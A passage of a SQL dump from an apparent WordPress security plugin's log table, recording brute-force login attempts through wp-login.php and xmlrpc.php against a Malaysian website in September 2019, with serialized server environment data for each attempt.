;}}','notice','2019-09-17 08:11:17','2019-09-17 08:11:15',17739760,19230168,'https://bintara.com.my/wp-login.php',1,0,'151.80.147.11'),(24465,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"151.80.147.11\";s:11:\"REMOTE_PORT\";s:5:\"49125\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCVJh@uZ4OC5N1Fn8FrQQAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568707878.7006\";s:12:\"REQUEST_TIME\";s:10:\"1568707878\";}}','notice','2019-09-17 08:11:20','2019-09-17 08:11:19',18257104,19557312,'https://bintara.com.my/xmlrpc.php',1,0,'151.80.147.11'),(24466,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.74.119\";s:11:\"REMOTE_PORT\";s:5:\"35046\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCXDR@uZ4OC5N1Fn8Ft3wAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568708365.1986\";s:12:\"REQUEST_TIME\";s:10:\"1568708365\";}}','notice','2019-09-17 08:19:26','2019-09-17 08:19:25',17741944,19233256,'https://bintara.com.my/wp-login.php',1,0,'167.99.74.119'),(24467,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.74.119\";s:11:\"REMOTE_PORT\";s:5:\"35674\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCXEB@uZ4OC5N1Fn8Ft4wAAAIo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568708368.4878\";s:12:\"REQUEST_TIME\";s:10:\"1568708368\";}}','notice','2019-09-17 08:19:29','2019-09-17 08:19:28',18256048,19555336,'https://bintara.com.my/xmlrpc.php',1,0,'167.99.74.119'),(24468,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"48954\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCZs7Ip53uPsY7BKArjDwAAAFQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568709044.1241\";s:12:\"REQUEST_TIME\";s:10:\"1568709044\";}}','notice','2019-09-17 08:30:47','2019-09-17 08:30:44',17737848,19228160,'https://bintara.com.my/wp-login.php',1,0,'46.101.143.24'),(24469,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"49746\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCZubIp53uPsY7BKArjdwAAAFI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568709049.7422\";s:12:\"REQUEST_TIME\";s:10:\"1568709049\";}}','notice','2019-09-17 08:30:54','2019-09-17 08:30:50',18257056,19556656,'https://bintara.com.my/xmlrpc.php',1,0,'46.101.143.24'),(24470,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.157.149\";s:11:\"REMOTE_PORT\";s:5:\"42028\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCckh@uZ4OC5N1Fn8F3HgAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568709778.896\";s:12:\"REQUEST_TIME\";s:10:\"1568709778\";}}','notice','2019-09-17 08:43:00','2019-09-17 08:42:59',17738080,19230560,'https://bintara.com.my/wp-login.php',1,0,'134.209.157.149'),(24471,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.157.149\";s:11:\"REMOTE_PORT\";s:5:\"43430\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCcmh@uZ4OC5N1Fn8F3MAAAAIM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568709786.3026\";s:12:\"REQUEST_TIME\";s:10:\"1568709786\";}}','notice','2019-09-17 08:43:07','2019-09-17 08:43:06',18255928,19555328,'https://bintara.com.my/xmlrpc.php',1,0,'134.209.157.149'),(24472,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.99.251.192\";s:11:\"REMOTE_PORT\";s:5:\"54539\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCejNK-omY048@iBsNJCgAAAMY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568710284.8142\";s:12:\"REQUEST_TIME\";s:10:\"1568710284\";}}','notice','2019-09-17 08:51:26','2019-09-17 08:51:25',17740344,19230712,'https://bintara.com.my/wp-login.php',1,0,'167.99.251.192'),(24473,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.99.251.192\";s:11:\"REMOTE_PORT\";s:5:\"55174\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCelLIp53uPsY7BKArlrwAAAEc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568710292.9938\";s:12:\"REQUEST_TIME\";s:10:\"1568710292\";}}','notice','2019-09-17 08:51:34','2019-09-17 